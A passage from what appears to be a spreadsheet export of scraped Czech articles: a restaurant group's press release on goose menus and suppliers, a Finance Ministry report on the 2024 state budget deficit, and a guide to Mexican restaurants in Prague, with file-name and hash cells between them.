hody nebo Vánoce. Pečená husa je často podávána s knedlíky a zelím, což je kombinace, která dokonale ladí s bohatou chutí husího masa. Příprava husy vyžaduje trpělivost a pečlivost, protože maso musí být pomalu pečeno, aby bylo křehké a šťavnaté. Kromě klasické pečené husy se v české kuchyni připravují i další pokrmy, jako jsou husí stehna dušená v zelí, husí játra, která se často podávají jako delikatesní paštika, nebo kaldoun, což je hustá polévka z husích drobů. Husí maso je ceněno pro svou výraznou chuť a je považováno za delikatesu, která si zaslouží místo na slavnostní tabuli. Husí menu restaurace Končina Polévka Husí kaldoun s játrovými knedlíčky, domácími nudlemi a sekanou zahradní zeleninkou a pažitkovým olejem s vůní šafránu Hlavní chod Staročeské bramborové lokše plněné trhaným husím masem, červeným zelí s jablky a povidlovou omáčkou Cena menu: 550 Kč Dítě do 12 let: 385 Kč Husí menu restaurace Rendlík Polévka Husí kaldoun s játrovými knedlíčky, domácími nudlemi a zahradní zeleninkou Julienne a pažitkovým olejem s vůní šafránu Hlavní chod Staročeské bramborové lokše plněné trhaným husím masem, červeným zelím s jablky a povidlovou omáčkou Dezert Citrónový mousse s teplým lesním ovocem a mátou Cena menu: 650 Kč Dítě do 12 let: 460 Kč Speciální listopadová nabídka nápojů Cabernet Moravia, Filiberk Kobylí- moravské zemské, suché, Česká republika (0,15 l) 125 Kč Autumn Fizz – podzimní koktejl na základě Amaro Ramazzoti 99 Kč Husí menu restaurace Chateau Ctěnice Předkrm Husí paštika s portským vínem , fíky, kaštany, meruňkovým chutney a karamelizovanými ořechy – 260 Kč Polévka Husí kaldoun s játrovými knedlíčky, domácími nudlemi, sekanou zahradní zeleninkou a pažitkovým olejem s vůní šafránu – 120 Kč Hlavní chod 1/4 pečené husy s červeným a bílým zelím, bramborovými lokšemi, karlovarským knedlíkem a husím jus s vůní rozmarýnu – 560 Kč Dezert Čokoládový dort s višněmi na smetanovém picasu a pistáciovým prachem – 160 Kč Husí menu restaurace Zlatý kohout Polévka Tradiční husí kaldoun, plátky z masové rolády s libečkem, julienne zelenina, růžičky pečeného květáku – 95 Kč Hlavní chod Pečené husí prso, celerové purée, omáčka z červené řepy, mrkvový gel, výhonky z ředkvičky – 375 Kč Dezert Švestková panna cotta, perníkový crumble, povidla s hřebíčkem – 125 Kč Vybraní dodavatelé restaurací Pytloun Restaurants: Drůbeží farma Holýšov Od roku 1990 stojí na Pelhřimovsku ve vísce Holýšov stejnojmenná farma. Její prioritou je soulad s přírodou. Snaží se o maximální snížení stresu drůbeže, což má zajisté vliv i na kvalitu masa. Specializují se převážně na chov vodní drůbeže, naleznete u nich kachny, kachňata a husy. Ale také hrabavou drůbež, což jsou kuřata, kohouti, perličky, bažanti a divocí krocani. Momentálně se mohou pochlubit více než 700 kusy hrabavé a vodní drůbeže. Chovaná drůbež využívá výhradně krytých laminátových přístřešků a okolních luk. Zvířata nejsou trápena, žijí pohodový život bez stresu, což se zákonitě projevuje i na jejich masu. Veškerá drůbež je krmena výhradně krmivem na přírodní bázi, to je obilným šrotem, klíčeným ječmenem. Zároveň mají dostatek přirozené potravy, kterou získávají ve venkovním výběhu. Husy jsou ze začátku odchovu, jako housata, krmeny obilním šrotem, později se přechází na klíčený ječmen. Po celou dobu chovu mají husy přes den volný výběh na pastvě, pouze na noc jsou zavírány do halových přístřešků. Husy jsou vykrmovány do stáří cca 180 dnů. Holštýnský skot Vše začíná ve správném výběru našeho dodavatele kvalitního a zároveň dostupného masa, které bez váhání jíme my sami, a proto z něj vaříme a prodáváme ho i Vám našim zákazníkům. Je pro nás důležité vědět a být přesvědčeni o tom, že prodáváme to, čemu sami věříme a s čím máme tu nejlepší zkušenost. Proto nakupujeme hovězí a telecí maso z Holandska , kde nám náš dodavatel i výrobce deklaruje a zajišťuje splňování nejvyšších standardů. Z nichž těmi nejdůležitějšími jsou dobré životní podmínky zvířat a sledovatelnost v celém výrobním řetězci. Zvěřina Petron od českých myslivců Zvěřina Petron pochází od mysliveckého sdružení pouze z České republiky , které se o zvěř celoročně stará a díky jejich péči je maso vysoce kvalitní. Zvěřina se vrací do tuzemských restaurací a domácností. Vysoce kvalitní maso srstnaté i pernaté zvěře pod značkou Petron se upravuje v moderních zařízeních v České republice . Na trh se zvěřina dodává ve stabilní kvalitě z prověřených zvířat ulovených v našich lesích. Tuto hodnotnou tradiční potravinu chceme v naší restauraci vrátit do našeho jídelníčku. Ekofarma Františka Berky z Tanvaldu Věnuje se již přes 20 let chovu masného skotu. Prioritou je kvalitní přístup a péče o něj. Postupně vytváří a zdokonaluje příjemné prostředí pro zvířata a má chov na nejvyšší evropské úrovni. To vše zajišťuje nepřekonatelnou chuť masa. Vychutnejte si jejich skvělé maso v biokvalitě. Kozí farma Pěnčín je splněným snem jedné rodiny, která se rozhodla změnit svůj způsob života. Získali zpět svoji nezávislost a chopili se příležitosti dělat věci, které mají smysl a jsou pro ostatní přínosné. Všechny kozy dobře prospívají v čistém prostředí, aby veškerý čas trávily na pastvinách ve volné přírodě, která je zde naprosto jedinečná. Veškeré krmení si vyrábí sami a pochází z místních horských luk. Odměnou za toto úsilí je kozí mléko té nejvyšší kvality pro všechny jejich výrobky – od čerstvých, až po dlouho zrající tvrdé sýry. Všechny výrobky se vyznačují jedinečnou chutí a jemností. Rybářství Skalní mlýn se nachází v panenské přírodě Moravského krasu v lokalitě CHKO, kde vzhledem k absenci chemických posypů nedochází k znečištění vod. Jedná se o ojedinělé zařízení tohoto druhu chovu ryb na krasové vodě v rámci Evropy . Ryby jsou chovány ve vodě říčky Punkvy , která vyvěrá v ekologicky čisté lokalitě a nikdy nepřesahuje teplotu 13°C. Od roku 2008 mají registrovánu ochranou známku punkevní pstruh. Destiláty Roviny slovo majitele Petra Skopala V malé vesnici Prosenice , v našich sadech, v rodinné palírně vznikají ovocné destiláty té nejjemnější chuti. Haná je mozaika polí protkaná vesničkami, řekami, chmelnicemi a sady. Až v dáli na horizontu v jemném oparu se zvedají Jeseníky . Jsme součástí tohoto kraje a ten je součástí nás. Máme rádi naše sady a okolní přírodu. Máme rádi horká léta i dlouhé stíny zlatavého podzimu. Máme rádi svou práci – od mozolů na rukou z trhání ovoce po vůni kvasu připraveného k destilování. A tak to měli naši dědové i ti jejich. Ovocné destiláty jsou moravskou tradicí, hrdostí každé rodiny. My jsme posunuli naši rodinnou pýchu o kus dál. Léta zkušeností jsme předestilovali v naši vlastní značku pálenek, které si nesou ty nejjemnější chuťové nuance. Gin Dlabka slovo majitelů Ondřej a Kateřina Dlabolovi Příběh moštárny a řemeslného lihovaru Dlabka. Náš život se zásadně změnil v roce 2017, kdy jsme ve Svijanském Újezdu nalezli místo, jež nám oběma doslova uhranulo. Jakmile jsme spatřili dokonalý výhled na Trosky i Ještěd a ucítili vůni zdejších stromů, rozhodli jsme se, že tady zůstaneme a něco společně vybudujeme. Poctivé řemeslo v souladu s přírodou. Snažíme se v maximální možné míře o návrat ke kořenům sadařského a lihovarnického řemesla. Nepoužíváme chemické postřiky a spíše, než těžkou techniku mezi stromy v našich sadech potkáte prasata, která se starají o přirozené hnojení a dojídají spadlé ovoce; kočky, které loví myši a další hlodavce; nebo naši teriérku Maki na ranní obchůzce. Samozřejmostí jsou pro nás také včely, díky kterým máme vždy perfektně opylený sad, výborný med pro vlastní spotřebu, a hlavně máme možnost jejich prostřednictvím okolní přírodě něco vracet. Restaurace Končina Restaurant Končina, Harrachov | Vítejte na oficiálních stránkách Restaurace Končina | Harrachov | Facebook Restaurace Končina (@restaurace_koncina) • Fotky a videa na Instagramu Restaurace Chateau Ctěnice Restaurant Chateau Ctěnice, Praha | Vítejte na oficiálních stránkách (restauracechateauctenice.cz) Restaurace Chateau Ctěnice | Facebook Restaurace Chateau Ctěnice (@restaurace_chateau_ctenice_) • Fotky a videa na Instagramu Restaurace Zlatý kohout Restaurant Zlatý kohout, Liberec | Vítejte na oficiálních stránkách Restaurace Zlatý kohout Liberec | Liberec | Facebook Restaurace Zlatý kohout (@restaurace_zlaty_kohout_) • Fotky a videa na Instagramu Restaurace Rendlík Restaurace Rendlík, Místo | Vítejte na oficiálních stránkách (restauracerendlik.cz) Restaurace Rendlík | Místo | Facebook https://www.instagram.com/restaurace_rendlik/ O společnosti PYTLOUN RESTAURANTS Restaurace patřící do skupiny PYTLOUN RESTAURANTS jsou umístěny na skvělých lokalitách v Praze , Liberci , Krkonoších a Krušných horách . Skupina zahrnuje restauraci Talíř a Pytloun Sky Bar &amp;amp; Restaurant Prague a restauraci Chateau Ctěnice v Praze , restauraci Zlatý kohout a Imperial Pizza Liberec v Liberci , restauraci Rendlík v Krušných horách , a restauraci Končina a Imperial Pizza Harrachov v Harrachově . Restaurace nabízejí vynikající českou a italskou kuchyni. V PYTLOUN RESTAURANTS kladou velký důraz na čerstvé suroviny od místních farmářů. Spolupráce s místními dodavateli zajišťuje kvalitní, čerstvé a sezónní suroviny pro připravované pokrmy. Skupina také podporuje udržitelné zemědělství a ekologické postupy, které přispívají k ochraně životního prostředí a podpoře lokálních komunit. Všechny restaurace se snaží využívat sezónní ingredience podle dostupnosti a nabídky od místních partnerů, což jim umožňuje připravovat pokrmy plné chuti a kvality. www.pytloun-restaurants.cz O společnosti PYTLOUN HOTELS PYTLOUN HOTELS patří k ceněným českým hotelovým značkám, která v současné době provozuje celkem čtrnáct designových i tradičních hotelů a šest restaurací, z toho osm hotelů v Liberci , kde je její vlajkovou lodí designový Pytloun Grand Hotel Imperial, dva horské hotely v Harrachově v Krkonoších a v Krušných horách , a čtyři hotely v Praze , jeden v srdci hlavního města na Václavském náměstí , dva hotely na pražské Kampě ( Pytloun Kampa Garden Hotel Prague a Pytloun Old Armoury Hotel Prague ) a čtvrtý v zámeckém areálu Ctěnice v místní části Vinoř na severovýchodním okraji Prahy . Díky důsledné diverzifikaci portfolia nabízí ubytování pro všechny typy hostů. Každý hotel sítě PYTLOUN HOTELS má svou vlastní osobitost a styl. Všechny ale sdílejí stejný závazek poskytovat hostům vynikající služby, moderní vybavení a výjimečný zážitek z pobytu. www.pytloun-hotels.cz Další tiskové zprávy Autor: FeedIT.cz Rubrika transition_slide Tisková zpráva</t>
  </si>
  <si>
    <t>1670</t>
  </si>
  <si>
    <t>612000</t>
  </si>
  <si>
    <t>20241101_181_3264615708_6a21d7e2e3d8789c8570.html</t>
  </si>
  <si>
    <t>6a21d7e2e3d8789c8570</t>
  </si>
  <si>
    <t>Hospodaření státního rozpočtu skončilo na konci října deficitem ve výši 200,7 mld. Kč - Plnění státního rozpočtu ČR za leden až říjen 2024</t>
  </si>
  <si>
    <t>Hospodaření státního rozpočtu skončilo na konci října deficitem ve výši 200,7 mld. Kč - Plnění státního rozpočtu ČR za leden až říjen 2024 Hospodaření státního rozpočtu skončilo na konci října deficitem ve výši 200,7 mld. Kč . Po očištění o příjmy a výdaje na projekty z Evropské unie a finančních mechanismů činil schodek 199,7 mld. Kč . Meziroční zlepšení salda o 38,2 mld. Kč bez započtení dopadu prostředků z Evropské unie a finančních mechanismů bylo taženo 5,5% nárůstem výběru daní a pojistného . I přes značný růst mandatorních titulů včetně obsluhy státního dluhu převyšují výdaje rozpočtu loňský objem jen mírně (+0,8 %). Pozitivně vnímám především stagnaci výdajů v době, kdy je řada mandatorních výdajů navyšována valorizačními mechanismy, dodržováním zákonných závazků a povinností splácet dluhy minulé vlády . Zbyněk Stanjura ministr financí “Pozitivně vnímám především stagnaci výdajů v době, kdy je řada mandatorních výdajů navyšována valorizačními mechanismy, dodržováním zákonných závazků a povinností splácet dluhy minulé vlády ,“ řekl ministr financí Zbyněk Stanjura a dodal: „Ve zbývající části roku lze očekávat zvýšené tlaky na rozpočet nejen v oblasti investic , ale i při řešení následků zářijových povodní . Nicméně aktuální požadavky na finanční prostředky z navýšené rozpočtové rezervy budou pro letošek dostačující a plánovaný deficit po novele zákona o rozpočtu ve výši 282 mld. Kč by mohl být dodržen.“ Plnění státního rozpočtu k 31.10.2024 (57,67 kB) Tabulky k plnění státního rozpočtu ČR za říjen 2024 Detailní informace jsou po uzávěrce finančních výkazů uvedeny obvykle 25. den po skončení měsíce v systému Monitor . Příjmy státního rozpočtu: Příjmy státního rozpočtu byly na konci října o 1,5 % (+24,0 mld. Kč) vyšší než před rokem . Inkaso pojistného vzrostlo o 52,0 mld. Kč, čistě daňové příjmy o 21,8 mld. Kč, k čemuž přispěla také změna rozpočtového určení daní (+8,7 mld. Kč). Saldo naopak zhoršovaly přijaté prostředky z Evropské unie a finančních mechanismů (-28,8 mld. Kč), nejvíce doposud meziročně nižší refundace prostředků z Národního plánu obnovy (-23,9 mld. Kč), ale také převody výnosů z majetkových účastí státu (-27 mld. Kč). Inkaso daně z příjmů fyzických osob ze závislé činnosti (+16,3 %, +14,5 mld. Kč) bylo podpořeno růstem mezd a změnami přijatými v rámci ozdravného balíčku , například snížením hranice pro druhou sazbu daně či úpravou zdanění vybraných nepeněžních benefitů. Nicméně řada změn z konsolidačního balíčku se projeví až při ročním zúčtování daně , tedy v následujícím roce . Na inkaso daně z příjmů právnických osob (-9,5 %, -15,8 mld. Kč), podobně jako u daně z příjmů fyzických osob placené poplatníky (+2,2 %, +0,1 mld. Kč) mělo vliv vyrovnání daně za zdaňovací období 2023 splatné v roce 2024 a zaplacené zálohy . Meziroční pokles inkasa ze zdanění právnických osob byl způsoben loňskou vysokou srovnávací základnou, kterou navýšilo vyrovnání daně za zdaňovací období 2022 . Zálohy v roce 2022 byly hrazeny dle daňových povinností za období 2020 a 2021 , avšak rok 2022 byl mimořádně ziskový, a proto i vyrovnání daně za rok 2022 bylo nezvykle vysoké . Inkaso daně z neočekávaných zisků ve výši 27,2 mld. Kč (+5,5 %, +1,4 mld. Kč) bylo pozitivně ovlivněno vyrovnáním daně za rok 2023 a zaplacenými zálohami na rok 2024 . Další záloha bude splatná v prosinci. Příspěvky z pojistného na sociální zabezpečení jsou v tomto roce zvýšeny znovuzavedením nemocenského pojištění zaměstnanců se sazbou ve výši 0,6 % a s dosavadním dopadem necelých 10 mld. Kč, kterým by mělo dojít k vyrovnání schodku systému nemocenského pojištění . Pozitivní vliv na inkaso má i zvýšení minimálního vyměřovacího základu pojistného na sociální pojištění osob samostatně výdělečně činných. Objem pojistného meziročně vzrostl o 9,2 % (+52,0 mld. Kč). Do inkasa daně z přidané hodnoty (+5,2 %, +15,4 mld. Kč) se promítá růst výdajů domácností na spotřebu , stejně jako dopady změn účinných od ledna 2024. Především jde o redukce počtu sazeb daně na základní 21 % a sníženou 12 % a přesunutí vybraného zboží a služeb ze snížené do základní sazby daně z přidané hodnoty . Inkaso spotřebních a energetických daní (+10,1 %, +12,4 mld. Kč) vzrostlo hlavně díky spotřební dani z minerálních olejů a tabákových výrobků. Meziroční růst inkasa spotřební daně z minerálních olejů (+14,0 %, +8,4 mld. Kč) je způsoben vrácením sazby spotřební daně z motorové nafty od 1. srpna 2023 na původní úroveň počátku roku 2022 (9,95 Kč/l z 8,45 Kč/l). Vývoj inkasa spotřební daně z tabákových výrobků (+7,5 %, +3,4 mld. Kč) odráží navýšení sazby a zdanění dosud nedaněných výrobků. Meziroční růst inkasa daní z elektřiny a zemního plynu je odrazem zrušení některých osvobození. Inkaso spotřební daně z lihu pokleslo (-4,4 %, -0,3 mld. Kč), nicméně očekáváme jeho růst v období před koncem roku před dalším zvýšením daně od 1. ledna 2025. Výběr ostatních spotřebních a energetických daní nezaznamenal ve srovnání s loňským rokem významnější výkyvy. Příjmy státního rozpočtu za leden až říjen DPH - daň z přidané hodnoty SD - spotřební daně z minerálních olejů, tabákových výrobků včetně surového tabáku a zahřívaných tabákových výrobků, piva , vína a meziproduktů, lihu a také včetně tzv. energetických daní a odvodu z elektřiny DPPO - daně z příjmů právnických osob z přiznání a vybíraná srážkou DPFO - daně z příjmů fyzických osob zahrnující daň ze závislé činnosti, z přiznání a vybíranou srážkou Mimořádné daně - daň z neočekávaných zisků (windfall tax) a odvod z nadměrných příjmů; Pojistné - pojistné na sociální zabezpečení a příspěvek na státní politiku zaměstnanosti. Nezahrnuje pojistné na veřejné zdravotní pojištění odváděné zdravotním pojišťovnám EU/FM - příjmy z Evropské unie a finančních mechanismů, které představují již proplacený podíl EU/FM na financování společných programů s ČR Ostatní - dopočet do celku daňových i ostatních příjmů nedaňové povahy. Výdaje státního rozpočtu: Celkové výdaje meziročně vzrostly o 14,1 mld. Kč (+0,8 %). Pro jejich tempo byl určující vývoj běžných výdajů (+1,8 %, +29,1 mld. Kč) tažený transfery státním fondům (+30,1 mld. Kč), dávkami důchodového pojištění (+22,9 mld. Kč) a ostatními sociálními dávkami (+8,8 mld. Kč), obsluhou státního dluhu (+12,2 mld. Kč), platbou veřejného zdravotního pojištění za státní pojištěnce (+10,6 mld. Kč), nákupy Ministerstva obrany (+8,9 mld. Kč) a výdaji na výzkum, vývoj a inovace (+1,4 mld. Kč). Dynamiku výdajů naopak snižovala podpora poskytovaná v oblasti energií (-56,0 mld. Kč) a investice (-15,0 mld. Kč) do značné míry determinované požadavky státních fondů na dotace ze státního rozpočtu. Na objemově nejvýznamnějších sociálních dávkách (+4,4 %, +31,7 mld. Kč) se nejvíce podílely výplaty důchodů (+4,0 %, +22,9 mld. Kč). Jejich výši kromě loňského mimořádného navýšení ovlivnila lednová řádná valorizace o 1,8 %. Rostoucí objem příspěvků na péči (+2,7 mld. Kč) souvisí s navýšením částek v návaznosti na změnu zákona o sociálních službách platnou od července tohoto roku. Vzrostl i příspěvek na bydlení (+2,2 mld. Kč), podpory v nezaměstnanosti (+2,0 mld. Kč) a nemocenské (+1,9 mld. Kč). Mimořádnou okamžitou pomoc v posledních dvou měsících navýšily žádosti občanů postižených zářijovými povodněmi (+0,5 mld. Kč). Naopak klesla výplata rodičovského příspěvku (-1,6 mld. Kč). Čerpání ostatních dávek prozatím nevybočuje od standardního vývoje předchozího roku. Výrazný nárůst neinvestičních dotací státním fondům (+79,9 %, +30,1 mld. Kč) určovaly prostředky poskytnuté Státnímu fondu dopravní infrastruktury (+13,1 mld. Kč), Státnímu zemědělskému intervenčnímu fondu (+15,8 mld. Kč) a Státnímu fondu životního prostředí (+1,4 mld. Kč). Meziroční navýšení je dáno především časovým nesouladem v poskytování dotací, které překračují loňské plnění o téměř 33 p. b. Obsluha státního dluhu představovala pro státní rozpočet výdaj v objemu 66,8 mld. Kč (+22,4 %, +12,2 mld. Kč). Při očištění o úrokové výnosy z protiinflačních státních dluhopisů, které byly v nejvyšších objemech vyplaceny loni v lednu, by tempo růstu dosahovalo vyšších hodnot. Valorizačním mechanismem upravené zvýšení měsíčních plateb veřejného zdravotního pojištění za tzv. státní pojištěnce z 1 900 Kč na 2 085 Kč vedlo k posílení zdrojů veřejného zdravotního systému z prostředků státního rozpočtu o 10,6 mld. Kč (+9,2 %). Běžné nákupy (bez obsluhy státního dluhu), které meziročně vzrostly o 8,3 mld. Kč (+14,2 %), byly nejvíce navýšeny výdaji Ministerstva obrany (+8,9 mld. Kč) souvisejícími s pořizováním víceúčelových nadzvukových letounů F-35 (+3,9 mld. Kč) a dalšími činnostmi a rozvojem bojových sil Armády České republiky . Za růstem neinvestičních transferů příspěvkovým a podobným organizacím o 3,7 mld. Kč (+4,8 %) stály nejvíce výdaje Ministerstva školství , mládeže a tělovýchovy (+3,4 mld. Kč) navýšené podporou výzkumu, experimentálního vývoje a inovací (+2,2 mld. Kč) a příspěvky na provoz vysokých škol (+1,1 mld. Kč). Naopak výrazně klesly běžné transfery podnikatelům (-52,3 %, -60,7 mld. Kč). Velká část jejich objemu i poklesu byla spojená s dotacemi do oblasti energetiky (-56,0 mld. Kč). Kompenzace za dodávku elektřiny a plynu zákazníkům a na ztráty z důvodu zastropování jejich cen dosáhly 8,2 mld. Kč (-40,0 mld. Kč) a dotace provozovateli přenosové soustavy 1,3 mld. Kč (-14,1 mld. Kč). Pomoc firmám v energeticky náročných odvětvích v tomto roce není vyplácena (-4,6 mld. Kč). Podpora obnovitelných zdrojů energie v objemu 15,3 mld. Kč (+2,7 mld. Kč) byla dočasně vyšší z důvodu odlišné splatnosti čtvrtletních záloh. Z ostatních transferů klesla podpora poskytovaná prostřednictvím společných progamů Evropské unie a České republiky (-3,1 mld. Kč), zejména OP Podnikání a inovace pro konkurenceschopnost 2014+ (-3,4 mld. Kč). Neinvestiční transfery územním rozpočtům se meziročně snížily o 7,9 mld. Kč (-3,5 %). Jejich součástí jsou dotace regionálnímu školství v objemu 166,1 mld. Kč (+4,2 mld. Kč) zahrnující prostředky na platy pedagogických a nepedagogických pracovníků na základních a středních školách. Výdaje na spolufinancování sociálních služeb (25 mld. Kč) se meziročně nezměnily a jejich objem již téměř dosáhl celoročního plánu. Za snížením transferů stálo prozatím nižší zapojení prostředků společných programů s Evropskou unií (-8,1 mld. Kč), v prvé řadě OP Jan Amos Komenský (-7,3 mld. Kč), klesající kompenzační příspěvek na ubytování osob s dočasnou ochranou (-4,7 mld. Kč) a loňské prezidentské volby (-0,6 mld. Kč). Odvody vlastních zdrojů do rozpočtu Evropské unie , jejichž výše je mimo jiné odvislá od úrovně hrubého národního důchodu a daně z přidané hodnoty, meziročně klesly o 3,1 mld. Kč (-6,5 %). Kapitálové výdaje v objemu 140,0 mld. Kč představují meziroční pokles o 9,7 % (-15,0 mld. Kč), který je nižší než tempo stanovené rozpočtovým plánem. Do průběhu uvolňování a realizace investic státu se v tomto roce promítá i skutečnost, že v letošním roce přecházíme na novou víceletou finanční perspektivu u evropských strukturálních a investičních fondů. Téměř polovinu těchto prostředků (68,8 mld. Kč; -8,7 mld. Kč) představovaly výdaje spolufinancované z rozpočtu Evropské unie . Na poklesu se nejvíce podílely nepravidelně poskytované dotace Státnímu fondu životního prostředí (-8,7 mld. Kč), Státnímu zemědělskému intervenčnímu fondu (-1,8 mld. Kč) a Státnímu fondu dopravní infrastruktury (-1,1 mld. Kč). Naopak vzrostly investiční nákupy Ministerstva obrany (+3,9 mld. Kč) zaměřené na udržení a rozvoj schopností Armády České republiky . Transfery vysokým školám (+4,0 mld. Kč) navyšovala především realizace projektů Národního plánu obnovy, OP Spravedlivá transformace a OP Jan Amos Komenský. Výdaje státního rozpočtu za leden až říjen Platy - platy a související výdaje vyplácené na úrovni organizačních složek státu (tj. bez platů vyplácených ve školství, zdravotnictví, příspěvkových organizacích) NT SS - neinvestiční transfery soukromoprávním subjektům směřované podnikatelským subjektům a neziskovým a podobným organizacím (např. spolkům, fundacím, ústavům, obecně prospěšným společnostem, církvím, politickým stranám a hnutím) NT VRÚÚ - neinvestiční transfery veřejným rozpočtům ústřední úrovně, které zahrnují především odvod veřejného zdravotního pojištění za státní pojištěnce a transfery státním fondům NT ÚSC - neinvestiční transfery veřejným rozpočtům územní úrovně představují z velké části dotace na platy v regionálním školství, transfery podle zákona o sociálních službách a příspěvěk na výkon státní správy. NT PO - neinvestiční transfery příspěvkovým a podobným organizacím představují zejména příspěvky na činnost zřízeným příspěvkovým organizacím, ale i dotace vysokým školám a veřejným výzkumným institucím Sociální dávky - zejména výdaje na starobní, invalidní, vdovské, vdovecké a sirotčí důchody, ale i vyplacené dávky nemocenského pojištění, státní sociální podpory, pěstounské péče, pomoci v hmotné nouzi, dávky pro příslušníky ozbrojených sil při skončení služebního poměru či osoby se zdravotním postižením Jiné NV - ostatní neinvestiční výdaje (dopočet do celku), které zahrnují především běžné provozní výdaje, výdaje na obsluhu státního dluhu, odvody do rozpočtu Evropské unie , kompenzace dopravcům za slevy nařízené státem apod. Investice - kapitálové výdaje realizované organizačními složkami státu v podobě přímých investic nebo transferů zejména státním fondům, municipalitám, podnikatelským subjektům, příspěvkovým a neziskovým organizacím, vysokým školám či veřejným výzkumným institucím. Dokumenty ke stažení Plnění státního rozpočtu k 31.10.2024 (58 kB) Autor: Kurzy.cz || MF ČR | (Ministerstvo financí ČR)</t>
  </si>
  <si>
    <t>199120</t>
  </si>
  <si>
    <t>245760</t>
  </si>
  <si>
    <t>20241101_182_3354613050_ac47da8504ff8ac8835c.html</t>
  </si>
  <si>
    <t>ac47da8504ff8ac8835c</t>
  </si>
  <si>
    <t>Kam na tacos či quesadillu: 7 vyhlášených mexických restaurací v Praze</t>
  </si>
  <si>
    <t>Kam na tacos či quesadillu: 7 vyhlášených mexických restaurací v Praze K mexickému jídlu nesmí chybět například margarita. Seznam Zprávy přináší přehled té nejlepší mexické kuchyně v české metropoli. Ve vybraných restauracích se snoubí typická mexická chuť s autentickou atmosférou a obslouží vás lidé, kteří této kuchyni opravdu rozumí. Článek si také můžete poslechnout v audioverzi. Praha se už řadu let může chlubit mexickými restauracemi. Autenticita hraje v těchto podnicích hlavní roli jak po chuťové, tak po dekorativní a vzhledové stránce. Vydejte se s námi do autentických podniků od centra města až po okrajové části. 1. Las Adelitas Las Adelitas Petrská. Las Adelitas je síť pěti pražských mexických restaurací. Pobočka v Petrské ulici zaujme pěknou lokací, je trochu odkloněná od rušných ulic, a přitom v centru. Bonusem je fakt, že se nachází kousek od Petrské věže a kostela svatého Petra , takže je co si prohlédnout i v okolí. Interiér restaurace je útulný a působí opotřebovaně v tom nejlepším slova smyslu - žádná přeblýskaná novota, ale naopak prostředí, které je jako ulité pro neformální povídání s přáteli u dobrého jídla a pití. Magazín Seznam Zpráv Cestování | Jídlo | Životní styl | Architektura | Historie Vetřelci v české krajině: 10 invazních druhů, jež ohrožují přírodu i zdraví Křišťálové lustry září v Kamenickém Šenově už tři sta let. Jak dnes vypadají? Váš nový přítel chlad: Zlepšuje zdraví i náladu. Pozvete ho domů? Roadtrip po Namibii . Dobrodružství, které musíte zažít Za husou i vínem . 10 tipů, kde si pochutnat na svatomartinských hodech V nabídce najdete například předkrm Taquitos, hlavní chody Tacos a Enchiladas na různé způsoby či Flautas. Pokud naplánujete návštěvu podniku v týdnu mezi 15 a 18 hodinou, dostanete drinky se slevou v rámci šťastné hodinky. 2. Barabizna Výzdoba interiéru v Barabizně. Barabiznu najdete na Zbraslavi , městské části na okraji Prahy , dostupné autobusem pouhých 13 minut ze Smíchova . Je to živá restaurace se šmrncem. Ovšem také dosti populární, takže chce-li mít člověk jistotu, že se usadí, je lepší si rezervovat místo. Podnik láká nejen svým originálním vzhledem, ale také chutným jídlem poctivě připravených mexických specialit. V nabídce najdete pokrmy s originálními a tematickými názvy, jako například biftek Komančero nebo Desperado. Rovněž si lze objednat klasiky Platos Mexicanos, Burritos, Enchiladas a Quesadillas na několik způsobů. K pití nabízí podnik mexická piva anebo Mezcal - destilát vyrobený z agáve. Barabiznu v roce 2002 vytopila povodeň do výšky označené na omítce budovy. Zajímavostí je, že v roce 2002 Barabiznu zcela vytopila povodeň, je totiž umístěná jen kousek od Vltavy . 3. Sabroso Autentická mexická výzdoba v restauraci Sabroso. V klidné oblasti, daleko od ruchu centra města, se nachází restaurace, která vás po gastronomické stránce vtáhne do srdce Mexika . Tento podnik se specializuje výhradně na autentickou mexickou kuchyni. Especialidade, neboli specialitou kuchyně je například plato Sabroso - výběr mexických chodů na jednom velkém tácku, který je ideální volbou pro dva. Nechybí na něm quesadilla plněná kuřecím masem, vydatné burrito naplněné chorizem, rýže a listový špenát, fajitas z vepřového masa a flauta plněná trhaným hovězím. A samozřejmě tradiční nachos doplněné sýrovým dipem. 4. Cantina Cantina byla otevřena v roce 1997. Její chutná a čerstvá mexická kuchyně se stala oblíbenou mezi místními obyvateli žijícími v okolí Malé Strany. Restaurace je ideálním místem pro romantickou večeři, oslavu s přáteli, ale i na klasický oběd. Můžete si tu vychutnat nejen vyhlášené mexické speciality, ale také nespočet lahodných koktejlů a prémiových lihovin. K návštěvě si však vezměte dostatek hotovosti, nedá se zde platit kartou. 5. Alebrijes Cocina Mexicana Interiér Alebrijes Cocina Mexicana. Tahle restaurace je pojata stylově s moderním přístupem, nachází se v ní bar i terasa. Alebrijes nabízí mexická jídla s velmi autentickou chutí. Za ochutnávku z menu stojí především chilaquiles a tacos. Kromě toho má Alebrijes skvělou nabídku vlastních koktejlů, jako je Mexgroni - což je Negroni, ale s mezcalem místo tradiční vodky. Pro milovníky pálivého se tu taky něco najde - Doñ Diablo, velmi originální, ale lehce pikantní koktejl. 6. Agave restaurant Agave Restaurant. Jen pár kroků od rušného Staroměstského náměstí se nachází oáza mexické kuchyně s názvem Agave. Při vstupu do restaurace rázem zapomenete, že jste uprostřed historického centra Prahy . Na jídelníčku naleznete veškeré mexické klasiky - od typických tacos a burrit až po další oblíbená jídla jako enchiladas. Vedle těchto tradičních specialit si navíc můžete vychutnat i svěže připravené saláty, guacamole nebo smažené avokádo. K jídlu se perfektně hodí margarita nebo mezcal. 7. Mexicali Mercado Mexicali Mercado. Jedná se o mexické bistro s mexickou tržnicí, kde je dostatek míst k sezení a v letních měsících navíc zahrádka. Denně zde pečou čerstvé pšeničné i kukuřičné tortilly z vlastní pekárny, tradiční kukuřičné nachos a tortilla chipsy. Výběr masa mají opravdu pestrobarevný - od tradičního vepřového Puerco Pibil po šťavnaté hovězí Carne Adobo a kuřecí Tinga de Pollo. Nechybí ani vegetariánská varianta s grilovaným kaktusem. Jídlo si doladíte za pomocí otevřeného salsa baru, který je plný domácích, čerstvých a výrazných sals i pikantních papriček. Mexicali Mercado získala ocenění Restaurant Guru 2023 za nejlepší mexickou restauraci v Praze . Chybí vám ve výčtu oblíbená pražská mexická restaurace? Napište nám o ní do diskuze pod článkem.</t>
  </si>
  <si>
    <t>20241101_183_3244146800_86ebb6a70c4f26d83a86.html</t>
  </si>
  <si>
    <t>86ebb6a70c4f26d83a86</t>
  </si>
  <si>
    <t>Rozdělila Berlín i&amp;nbsp;tisíce lidských životů: Od pádu Berlínské zdi letos uplyne 35&amp;nbsp;let</t>
  </si>
  <si>
